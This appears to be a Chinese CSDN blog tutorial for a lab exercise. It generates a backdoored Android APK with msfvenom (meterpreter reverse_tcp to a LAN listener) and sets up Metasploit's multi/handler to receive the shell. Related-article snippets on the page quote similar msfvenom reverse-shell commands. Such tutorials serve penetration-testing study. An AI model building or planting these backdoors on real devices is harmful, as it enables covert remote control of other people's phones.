Metasploit反弹shell.apk实验（Android）

最新推荐文章于 2025-05-18 23:12:04 发布

快乐的小猪v

最新推荐文章于 2025-05-18 23:12:04 发布

阅读量208

点赞数 8

分类专栏： Metasploit复现文章标签：安全性测试网络安全 android

本文链接：https://blog.csdn.net/m0_51781051/article/details/148017063

版权

Metasploit复现专栏收录该内容

6 篇文章

订阅专栏

一、环境准备

MSF-Metasploit Framework
一台安装手机或者模拟器

二、木马生成

生成一个APK后门
msfvenom -p android/meterpreter/reverse_tcp LHOST={监控IP} LPORT={监控端口} R>k.apk。

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.110.38 LPORT=4567 R>k.apk

三、配置监控

模拟器安装木马文件，通过python或复制传播
启动msf 终端内输入：msfconsole 启动msf
载入监控模块 msf中输入： use exploit/multi/handler
载入payload MSF终端中输入： set payload android/meterpreter/reverse_tcp
配置payload MSF终端中输入：show options
配置监控IP MSF中输入：set lhost <监控的IP>
配置监控端口 MSF中输入：set lporr <监控的端口>
执行监控 msf终端中输入： run

四、攻击利用

将木马上传到靶机
在靶机上执行木马
完成攻击利用

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

快乐的小猪v

关注关注

8
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

metasploit局域网木马实现公网反弹

weixin_43062666的博客

09-11

1429

metasploit局域网木马实现公网反弹众所都周知，metasploit中的venom木马一般只能用在内网环境内。但是通过内网穿透（NAT）我们可以实现在公网环境下的反弹shell。首先下载内网穿透软件本人选择了花生壳 1. 添加映射首先在花生壳里添加一个映射，应用类型勾选tcp 映射的内网主机设置为127.0.0.1，端口为4444 确保映射已经打开 2.生成木马打开metasploit su cd /opt/metasploit-framework/bin ./msfconsole

Metasploit

m0_57379855的博客

03-30

3372

Metasploitmetasploit下载ubuntu安装msfubuntu下载Kali开启msfKali下载Kali添加root用户打开msfKali更新msfViper炫彩蛇Kali安装viperMetasploit目录结构Metasploit模块auxiliaryexploitspayloadspostencodersevasionnopsmsfvenom常用参数-l-p-f-e-a-o-b-n-s-i-c-x-k-v各平台生成payload命令WindowsMacAndroidPowershell

参与评论您还未登录，请先登录后发表或查看评论

Metasploit 反弹Shell

panpan高的博客

04-03

711

Metasploit框架是一款开源的渗透测试平台，由H.D. Moore于2003年开发，后被Rapid7收购。它集成了漏洞扫描、利用、后渗透测试等功能，广泛应用于网络安全评估和漏洞验证。

msf反弹shell

cj_Hydra's Blog

02-01

1564

windows+exe反弹使用msfvenom模块生成一个被控端的客户端文件，这里用windows 64为例(如果不加x64，则默认是32位),此时就会生成一个shell.exe的程序。 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=攻击机ip地址 lport=监听端口 -f exe >shell.exe 在攻击机的m...

metasploit篇

08-21

332

第一部分：基本使用 1、在kali中metasploit默认使用postgresql作为它的数据库； /etc/init.d/postgresql start 开机自启：update-rc.d postgresql enable。2、初次使用数据库服务时需初始化，以便创建系统默认的数据库及数据库用户； msfdb init（默认创建的数据库名：msf，msf_test...

Metasploit基础----msfconsole

weixin_53736204的博客

08-23

2363

MSF所⽤功能主要可分为这⼏个模块，每个模块都有各⾃的功能领域，形成了渗透测试的流程模块路径：/usr/share/metasploit-framework/modules/漏洞利⽤(exploit)：/usr/share/metasploit-framework/modules/exploitspayload模块路径：：/usr/share/metasploit-framework/modules/payloads。

利用Metasploit攻击Android

weixin_30315435的博客

09-21

471

首先我在Kali下生成一个Android的应用程序，即apk格式的文件，用到的命令是： msfvenom -p android/meterpreter/reverse_tcp LHOST=本地ip LPORT=监听端口 R > /root/rb.apk 注释：-p：指的是在本次环境中攻击所使用的payload，这个payload就是将Android攻击成功之后的反弹连接发送到攻...

渗透之——Metasploit命令及模块

热门推荐

冰河的专栏

01-26

3万+

show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的渗透攻击和其他模块。 info 展示出制定渗透攻击或模块的相关信息。 use name 装载一个渗透攻...

《web渗透测试》Metasploit框架基本命令使用

m0_74100826的博客

11-19

637

Metasploit 是一个流行的渗透测试和漏洞利用框架，广泛用于安全评估、漏洞开发和渗透测试。以下是 Metasploit 框架的基本使用步骤和概念介绍。Metasploit 体系模块的灵活性和强大功能使其成为安全专业人员和渗透测试人员的重要工具。其模块化设计能够有效应对不断变化的网络安全威胁。

Kali linux 学习笔记（九十六）metasploit framework——客户端渗透 2020.4.28

闵行小鱼塘

04-28

929

本节学习客户端渗透

木马渗透安卓系统实验

polaris___的博客

05-30

4693

1.实验内容 Metasploit后门攻击实现远程控制Android手机 2.实验环境设备 IP 子网掩码 Kali Linux（Hack） 222.20.78.6 255.255.248.0 Android（靶机） 10.11.6...

安全性测试常规测试点全解析：从基础到高级的实战指南

菜狗小测试

04-25

1287

安全性测试是一个覆盖设计、开发、部署、运行全生命周期的系统工程。通过对认证授权、会话管理、输入验证等核心测试点的深度把控，结合自动化工具与人工验证，能够有效降低系统安全风险。安全不是一次性任务，而是持续改进的过程。只有建立常态化的安全测试机制，才能抵御不断演变的网络攻击。希望本文能为你的安全测试工作提供清晰的路线图，欢迎在实践中结合具体场景扩展应用！

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8697

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

PHP8.0版本导出excel失败

pengone的博客

05-17

255

失败原因分析：只有最后一步$writer->save 失败，由于php8.0版本缺少8.2版本的一些新特性导致失败，可以尝试升级或者回退版本。环境：fastadmin框架，不是原版接手的项目。PHP8.0,mysql5.7.// 创建一个新的 Spreadsheet 对象。// 设置 HTTP 头信息。

Android App CAN通信测试

tianpu2320959696的博客

05-16

562

CAN总线协议（Controller Area Network），控制器局域网总线，是德国BOSCH（博世）公司研发的一种串行通讯协议总线，它可以使用双绞线来传输信号，是世界上应用最广泛的现场总线之一。

Laravel 参数验证工具

一眼青苔

05-16

314

Laravel 提供了强大的参数验证工具，简化了数据验证流程。通过创建自定义 FormRequest 类，开发者可以定义验证规则，并在控制器中直接使用该类进行参数验证。如果验证成功，程序继续执行；如果失败，Laravel 会自动返回 422 响应并显示错误信息。此外，还可以使用 Validator 类在控制器中手动验证参数，但推荐使用 FormRequest 类，因为它将验证逻辑与控制器分离，使代码更清晰、易于维护。通过这种方式，开发者可以轻松确保参数（如 book_id）满足特定规则，而无需手动处理验证逻

PHP中的SPL（标准PHP库）：提升开发效率的工具集

2402_82472226的博客

05-16

368

PHP的标准库（SPL，Standard PHP Library）是一个强大的工具集，旨在增强PHP的功能性和开发效率。SPL提供了多种数据结构（如栈、队列）、迭代器（如ArrayIterator、RecursiveIterator）、异常处理机制和自动加载功能，帮助开发者更高效地管理和操作数据。通过实际代码示例，展示了如何使用SplStack、SplQueue等数据结构，以及如何利用迭代器遍历数组和递归遍历多维数组。此外，SPL还提供了自定义异常类和自动加载功能，简化了类的加载过程。SPL的使用可以显著提

Android Activity之间跳转的原理

diaostar的博客

05-14

538

处理器（Handler）创建目标 Activity 实例，依次调用其。当前 Activity 在目标 Activity 启动前执行。Android Activity跳转的底层实现涉及 ‌。封装为标准化请求，并校验权限与目标合法性。，待目标 Activity 完成。回调目标应用进程，触发。

Android 手写签名功能详解：从原理到实践